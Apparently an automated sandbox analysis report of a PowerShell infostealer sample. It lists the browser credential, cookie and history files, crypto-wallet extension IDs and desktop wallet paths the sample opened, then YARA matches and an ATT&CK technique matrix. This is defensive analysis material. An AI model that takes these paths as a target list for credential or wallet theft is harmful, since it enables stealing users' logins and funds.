                Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *ethereum*
                Source: powershell.exe, 00000008.00000002.4464852873.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: powershell.exe, 00000002.00000002.2154778232.0000000007C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7448, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                12
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts111
                Process Injection
                3
                Obfuscated Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop Protocol31
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts3
                PowerShell
                Logon Script (Windows)Logon Script (Windows)2
                Software Packing
                Security Account Manager321
                Security Software Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Email Collection
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets221
                Virtualization/Sandbox Evasion
                SSH2
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
